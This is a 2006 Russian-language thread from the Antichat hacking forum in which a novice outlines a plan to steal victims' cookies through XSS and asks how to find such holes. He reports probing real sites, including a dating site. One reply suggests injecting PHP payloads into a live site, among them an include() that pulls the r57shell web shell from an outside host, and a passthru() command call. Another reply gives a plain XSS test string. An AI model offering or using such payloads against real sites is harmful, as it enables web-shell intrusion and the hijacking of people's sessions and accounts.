Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
01.07.2006, 18:04
|
|
Новичок
Регистрация: 01.07.2006
Сообщений: 5
Провел на форуме:
7480
Репутация:
0
|
|
Xss
Привет все! У меня вопрос надеюсь ответите! Я много прочитал инфы с разных сайтов про Xss и как воровать куки! Уяснил для себя что надо сделать следующее
1) Зарегистрировать хостинг с php
2) Закачать туда скрипт для кражи куков!
3) Потом дать жертве ссылку на свой скрипт, ну и ссылку желательно "замоскировать"
4) потом с помощью проги (cookieeditor) использовать куки в своих целях!
Теперь вопросы с вашего позваления!
Я так понял что жертве можно дать ссылку (через javascpirt) если на сайте есть Xss уязвимости!
ОСНОВНОЙ ВОПРОС !!!!!!!!! КАК САМОМУ И ИМЕННО САМОМУ МОЖНО НАЙТИ ЭТИ САМЫЕ XSS УЯЗВИМОСТИ НА САЙТЕ! МЕНЯ ИНТЕРЕСУЕТ САМ ПРОЦЕСС ПОИСКА ЭТИХ УЯЗВИМОСТЕЙ!! С ЧЕГО НАДО НАЧИНАТЬ И ЧТО КУДА ПОДСТАВЛЯТЬ? я прочитал много faq по xss, но везде написано что можно сделать если есть XSS уязвимость а КАК ЕЁ НАЙТИ САМОМУ НЕТ!!!!! ПОЖАЛУЙСТА ОПИШИТЕ ВЕСЬ ПРОЦЕСС НАХОЖДЕНИЯ XSS бага!! Или накидайте ссылок где можно прочитать!!! ОГРОМНОЕ СПАСИБО ЗАРАНЕЕ!!  |
|
|
01.07.2006, 18:25
|
|
Познающий
Регистрация: 23.05.2006
Сообщений: 55
Провел на форуме:
652099
Репутация:
19
|
|
Накидываю сцылку - http://forum.antichat.ru/thread20140.html. Пержде, чем создавать тему или что-то спрашивать, сначала воспользуйся поиском, так как если поискать, то на форуме можно найти ПОЧТИ ВСЁ.
|
|
|
|
02.07.2006, 17:37
|
|
Новичок
Регистрация: 01.07.2006
Сообщений: 5
Провел на форуме:
7480
Репутация:
0
|
|
Спасибо этой стать еще не читал
Кто знает где еще инфы надыбать кидайте сюда ссылки!!
|
|
|
|
23.08.2006, 18:15
|
|
Новичок
Регистрация: 01.07.2006
Сообщений: 5
Провел на форуме:
7480
Репутация:
0
|
|
На одном из сайтов подставил :";!--"<fuck>=&{()} и он(сайт) выдал мне следующее сообщение:
Parsing error
:16: parser error : Unescaped '<' not allowed in attributes values
<param name='!--"<fuck>'></param>
^
:16: parser error : attributes construct error
<param name='!--"<fuck>'></param>
^
:16: parser error : Couldn't find end of Start Tag param line 16
<param name='!--"<fuck>'></param>
^
:16: parser error : Opening and ending tag mismatch: fuck line 16 and param
<param name='!--"<fuck>'></param>
^
at /home/mheart/cgi-bin/index.pl line 584
Что это значит?   |
|
|
|
23.08.2006, 19:30
|
|
Постоянный
Регистрация: 23.04.2006
Сообщений: 622
Провел на форуме:
5887054
Репутация:
1292
|
|
Сообщение от KrikSta
:16: parser error : Unescaped '<' not allowed in attributes values
<param name='!--" <fuck>'></param> Тут скорее всего чтото вроде
попробуй
Код:
ha".passthru("dir")."ha
или
Код:
ha".include("http://rst.void.ru/download/r57shell.txt")."ha
|
|
|
|
24.08.2006, 09:56
|
|
Новичок
Регистрация: 01.07.2006
Сообщений: 5
Провел на форуме:
7480
Репутация:
0
|
|
Спасибо за помощь парни! Ответьте еще на один вопрос)))
На одном из сайте знакомсят есть раздел ТОП 100(ну там типа фотки самых красивых) когда я в URL подставил "><script>alert("XSS")</script> эти фотки исчезли, но сообщение не выкидывает? Это XSS уязвимость? Если да то почему не выкидывает сообщение?
|
|
|
|
24.08.2006, 11:09
|
|
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925
Репутация:
1348
|
|
Сообщение от KrikSta
Спасибо за помощь парни! Ответьте еще на один вопрос)))
На одном из сайте знакомсят есть раздел ТОП 100(ну там типа фотки самых красивых) когда я в URL подставил "><script>alert("XSS")</script> эти фотки исчезли, но сообщение не выкидывает? Это XSS уязвимость? Если да то почему не выкидывает сообщение?
Посмотри исходный код страницы, поищи слово alert, а там уже сам определишься. Не выкидывает сообщение, т. к. так задумано - отключены сообщения об ошибках. Может быть для отдельной функции (в php это делает символ @ перед именем функции, например @fopen()), а может быть для всех ошибок вообще.
__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.
|
|
|
|
24.08.2006, 13:34
|
|
Новичок
Регистрация: 01.07.2006
Сообщений: 5
Провел на форуме:
7480
Репутация:
0
|
|
Сообщение от 1ten0.0net1
Посмотри исходный код страницы, поищи слово alert, а там уже сам определишься. Не выкидывает сообщение, т. к. так задумано - отключены сообщения об ошибках. Может быть для отдельной функции (в php это делает символ @ перед именем функции, например @fopen()), а может быть для всех ошибок вообще.
Блин просмотрел исходный html код слово alert не нашел. После вставки java кода опять посмотрел и опять слова alert нету. Нихрена не понимаю
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
